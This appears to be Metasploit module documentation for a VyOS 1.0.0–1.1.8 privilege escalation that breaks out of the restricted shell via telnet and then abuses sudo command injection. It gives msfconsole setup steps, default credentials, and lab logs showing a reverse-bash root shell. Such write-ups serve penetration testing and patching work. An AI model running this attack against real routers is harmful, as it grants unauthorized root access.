## Vulnerable Application

This module exploits command injection vulnerabilities and an insecure
default sudo configuration on [VyOS](https://www.vyos.io/products/)
versions 1.0.0 <= 1.1.8 to execute arbitrary system commands as root.

VyOS features a `restricted-shell` system shell intended for use by
low privilege users with operator privileges. This module exploits
a vulnerability in the `telnet` command to break out of the restricted
shell, then uses sudo to exploit a command injection vulnerability in
`/opt/vyatta/bin/sudo-users/vyatta-show-lldp.pl` to execute commands
with root privileges.

This module has been tested successfully on VyOS 1.1.8 amd64 and
VyOS 1.0.0 i386.

## Verification Steps

Download:

* https://downloads.vyos.io/?dir=release/legacy/

Login as `vyos` / `vyos`.

Create a new user with `operator` privileges:

```
vyos@vyos:~$ configure
[edit]
vyos@vyos# set system login user jsmith full-name "John Smith"
[edit]
vyos@vyos# set system login user jsmith authentication plaintext-password password
[edit]
vyos@vyos# set system login user jsmith level operator
[edit]
vyos@vyos# commit
s[edit]
vyos@vyos# save
Saving configuration to '/config/config.boot'...
Done
```

Start the OpenSSH service:

```
vyos@vyos:~$ sudo sh
sh-4.1# service ssh start
```

1. Start msfconsole
1. Do: `use exploit/linux/ssh/vyos_restricted_shell_privesc`
1. Do: `set RHOSTS [IP]`
1. Do: `set USERNAME [username]`
1. Do: `set PASSWORD [password]`
1. Do: `set payload [payload]`
1. Do: `set LHOST [IP]`
1. Do: `exploit`

## Options

### USERNAME

SSH username (default: `vyos`)

### PASSWORD

SSH password (default: `vyos`)

## Scenarios

### VyOS 1.1.8 (amd64) - operator user

```
msf > use exploit/linux/ssh/vyos_restricted_shell_privesc
[*] Using configured payload cmd/unix/reverse_bash
msf exploit(linux/ssh/vyos_restricted_shell_privesc) > set rhosts 172.16.191.158
rhosts => 172.16.191.158
msf exploit(linux/ssh/vyos_restricted_shell_privesc) > set username jsmith
username => jsmith
msf exploit(linux/ssh/vyos_restricted_shell_privesc) > set password password
password => password
msf exploit(linux/ssh/vyos_restricted_shell_privesc) > check
[*] 172.16.191.158:22 - The service is running, but could not be validated. SSH service detected.
msf exploit(linux/ssh/vyos_restricted_shell_privesc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf exploit(linux/ssh/vyos_restricted_shell_privesc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444
[*] 172.16.191.158:22 - Attempt to login to VyOS SSH ...
[+] SSH connection established
[*] Requesting PTY ...
[+] PTY successfully obtained
[*] Requesting shell ...
[+] Remote shell successfully obtained
[*] Remote system is VyOS
[*] Remote session is using restricted-shell. Attempting breakout to system shell ...
[+] Unrestricted system shell successfully obtained. Sending payload ...
[*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.158:36030) at 2020-09-18 11:30:49 -0400

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux vyos 3.13.11-1-amd64-vyos #1 SMP Sat Nov 11 12:10:30 CET 2017 x86_64 GNU/Linux
cat /etc/issue
Welcome to VyOS - \n \l
```

### VyOS 1.1.8 (amd64) - admin user

```
msf > use exploit/linux/ssh/vyos_restricted_shell_privesc
[*] Using configured payload cmd/unix/reverse_bash
msf exploit(linux/ssh/vyos_restricted_shell_privesc) > set rhosts 172.16.191.158
rhosts => 172.16.191.158
msf exploit(linux/ssh/vyos_restricted_shell_privesc) > set username vyos
username => vyos
msf exploit(linux/ssh/vyos_restricted_shell_privesc) > set password vyos
password => vyos
msf exploit(linux/ssh/vyos_restricted_shell_privesc) > check
[*] 172.16.191.158:22 - The service is running, but could not be validated. SSH service detected.
msf exploit(linux/ssh/vyos_restricted_shell_privesc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf exploit(linux/ssh/vyos_restricted_shell_privesc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444
[*] 172.16.191.158:22 - Attempt to login to VyOS SSH ...
[+] SSH connection established
[*] Requesting PTY ...
[+] PTY successfully obtained
[*] Requesting shell ...
[+] Remote shell successfully obtained
[*] Remote system is VyOS
[*] Remote session is using unrestricted shell. Launching system shell ...
[+] Unrestricted system shell successfully obtained. Sending payload ...
[*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.158:36103) at 2020-09-18 11:32:49 -0400

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux vyos 3.13.11-1-amd64-vyos #1 SMP Sat Nov 11 12:10:30 CET 2017 x86_64 GNU/Linux
cat /etc/issue
Welcome to VyOS - \n \l
```
